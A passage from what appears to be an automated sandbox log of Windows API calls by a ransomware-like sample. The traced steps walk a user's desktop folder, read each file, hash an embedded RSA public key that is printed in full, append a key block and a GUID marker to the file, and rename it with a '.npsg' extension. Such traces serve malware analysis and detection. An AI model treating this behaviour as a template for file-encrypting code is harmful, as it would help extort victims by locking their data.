(HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b82168 [0237.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0237.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0237.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0237.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0237.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0237.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.398] GetCurrentThreadId () returned 0x5b4 [0237.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0237.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0237.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0237.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0237.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400638 [0237.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0237.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0237.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0237.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0237.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34005d8 [0237.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0237.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0237.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0237.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0237.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34005f0 [0237.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0237.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0237.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34005c0 [0237.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0237.400] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x17571, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.400] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0237.400] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.400] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.401] CloseHandle (hObject=0x644) returned 1 [0237.405] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UKh5\\DxyCVfw3NYqWMFEr.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ukh5\\dxycvfw3nyqwmfer.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UKh5\\DxyCVfw3NYqWMFEr.png.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ukh5\\dxycvfw3nyqwmfer.png.npsg")) returned 1 [0237.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.406] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0237.408] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1e3a6d0, ftCreationTime.dwHighDateTime=0x1d5ba34, ftLastAccessTime.dwLowDateTime=0xdf4774d0, ftLastAccessTime.dwHighDateTime=0x1d5c380, ftLastWriteTime.dwLowDateTime=0xdf4774d0, ftLastWriteTime.dwHighDateTime=0x1d5c380, nFileSizeHigh=0x0, nFileSizeLow=0xa4eb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GB6gNr7G.m4a", cAlternateFileName="")) returned 1 [0237.408] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UKh5\\GB6gNr7G.m4a") returned=".m4a" [0237.408] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UKh5\\GB6gNr7G.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ukh5\\gb6gnr7g.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.409] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=42219) returned 1 [0237.409] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.412] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xa4c5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.413] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.415] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xa4eb, lpOverlapped=0x0) returned 1 [0237.416] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.416] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.416] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.416] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0237.417] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.417] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.417] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.417] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.417] GetLastError () returned 0x0 [0237.417] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.417] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0237.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.418] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.418] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.418] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.418] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005f0 | out: hHeap=0x620000) returned 1 [0237.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400608 | out: hHeap=0x620000) returned 1 [0237.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400650 | out: hHeap=0x620000) returned 1 [0237.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400650 [0237.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0237.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400608 [0237.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0237.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34005f0 [0237.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7ba60 [0237.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0237.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7bb78 [0237.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0237.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0237.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400608 | out: hHeap=0x620000) returned 1 [0237.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005f0 | out: hHeap=0x620000) returned 1 [0237.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0237.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400650 | out: hHeap=0x620000) returned 1 [0237.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0237.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.420] GetCurrentThreadId () returned 0x5b4 [0237.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0237.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b821f8 [0237.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0237.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0237.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0237.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0237.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0237.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.420] GetCurrentThreadId () returned 0x5b4 [0237.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0237.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.421] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xa4eb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.421] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.422] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.422] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.422] CloseHandle (hObject=0x644) returned 1 [0237.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x3b83cd0 [0237.424] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UKh5\\GB6gNr7G.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ukh5\\gb6gnr7g.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UKh5\\GB6gNr7G.m4a.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ukh5\\gb6gnr7g.m4a.npsg")) returned 1 [0237.426] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5ff4680, ftCreationTime.dwHighDateTime=0x1d5c4b6, ftLastAccessTime.dwLowDateTime=0x1289cdc0, ftLastAccessTime.dwHighDateTime=0x1d5bcd3, ftLastWriteTime.dwLowDateTime=0x1289cdc0, ftLastWriteTime.dwHighDateTime=0x1d5bcd3, nFileSizeHigh=0x0, nFileSizeLow=0x18d84, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="p-DM0J8.bmp", cAlternateFileName="")) returned 1 [0237.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0237.426] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UKh5\\p-DM0J8.bmp") returned=".bmp" [0237.426] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UKh5\\p-DM0J8.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ukh5\\p-dm0j8.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.427] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=101764) returned 1 [0237.427] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.430] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x18d5e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.430] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.432] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x18d84, lpOverlapped=0x0) returned 1 [0237.433] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.433] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.434] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.434] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0237.435] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.435] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.435] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.435] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.435] GetLastError () returned 0x0 [0237.435] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.435] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0237.435] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.435] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.435] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.436] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400608 | out: hHeap=0x620000) returned 1 [0237.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400620 | out: hHeap=0x620000) returned 1 [0237.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400668 | out: hHeap=0x620000) returned 1 [0237.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400668 [0237.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0237.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400620 [0237.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400608 [0237.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 